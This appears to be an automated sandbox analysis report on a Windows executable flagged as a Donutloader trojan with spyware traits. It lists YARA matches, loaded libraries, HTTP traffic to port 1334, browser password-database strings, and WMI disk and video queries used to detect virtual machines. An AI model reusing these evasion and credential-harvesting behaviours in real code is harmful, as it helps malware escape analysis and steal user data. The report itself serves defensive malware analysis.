Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1955043289.000001D60971C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1954884538.000001D6096B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9B8B7289	0_3_00007FFD9B8B7289
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9B8BAF30	0_3_00007FFD9B8BAF30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9B8BAE70	0_3_00007FFD9B8BAE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9B8C461C	0_3_00007FFD9B8C461C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9B8C0B28	0_3_00007FFD9B8C0B28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9B8BF25E	0_3_00007FFD9B8BF25E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9B8BB125	0_3_00007FFD9B8BB125
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9B8BAE68	0_3_00007FFD9B8BAE68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9B8C34FA	0_3_00007FFD9B8C34FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9BB4C341	0_3_00007FFD9BB4C341
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9BB4A7CC	0_3_00007FFD9BB4A7CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9BB49CC9	0_3_00007FFD9BB49CC9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9BB4B465	0_3_00007FFD9BB4B465
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9BB4CC9A	0_3_00007FFD9BB4CC9A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9B971EE5	0_3_00007FFD9B971EE5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9B970147	0_3_00007FFD9B970147
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00007FFD9B9729BE	0_3_00007FFD9B9729BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000001D6098CAA1C	0_2_000001D6098CAA1C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000001D6098CADF8	0_2_000001D6098CADF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000001D6098CE4D4	0_2_000001D6098CE4D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000001D6098CBCDC	0_2_000001D6098CBCDC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000001D6098CB228	0_2_000001D6098CB228
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000001D6098C9B40	0_2_000001D6098C9B40

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7056 -s 2356

Source: file.exe

Static PE information: Number of sections : 11 > 10

Source: file.exe, 00000000.00000002.1956078575.000001D60B499000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: OriginalFilename vs file.exe

Source: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1955043289.000001D60971C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1954884538.000001D6096B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: WERB6FD.tmp.dmp.4.dr	Binary string: \Device\Harddisk0\Partition3.384070+
Source: WERB6FD.tmp.dmp.4.dr	Binary string: \Device\Harddisk0\Partition3

Source: classification engine

Classification label: mal96.troj.spyw.evad.winEXE@2/49@1/1

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\file.exe	Mutant created: \Sessions\1\BaseNamedObjects\CWMxSt
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7056

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\tmpAAB3.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpE31C.tmp.0.dr, tmpAAB3.tmp.0.dr, tmpE31B.tmp.0.dr, tmpE32C.tmp.0.dr, tmpE32D.tmp.0.dr, tmpAAC4.tmp.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

String found in binary or memory: -START(0

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7056 -s 2356

Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: file.exe

Static file information: File size 2208256 > 1048576

Source: file.exe

Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x13f600

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: System.Runtime.Serialization.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Xml.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.pdb` source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Drawing.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Management.pdbp source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Net.Http.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.ServiceModel.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Xml.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Core.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: mscorlib.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Net.Http.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Drawing.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Management.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: mscorlib.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Management.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.ServiceModel.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Core.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Runtime.Serialization.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Xml.pdb3X2 source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.ServiceModel.pdb0 source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.ServiceModel.ni.pdb source: WERB6FD.tmp.dmp.4.dr

Source: file.exe

Static PE information: real checksum: 0x217197 should be: 0x21f17c

Source: file.exe

Static PE information: section name: .xdata

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 1334
Source: unknown	Network traffic detected: HTTP traffic on port 1334 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 1334
Source: unknown	Network traffic detected: HTTP traffic on port 1334 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 1334 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 1334
Source: unknown	Network traffic detected: HTTP traffic on port 1334 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 1334
Source: unknown	Network traffic detected: HTTP traffic on port 1334 -> 49733

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1D609830000 memory reserve \| memory write watch			Jump to behavior
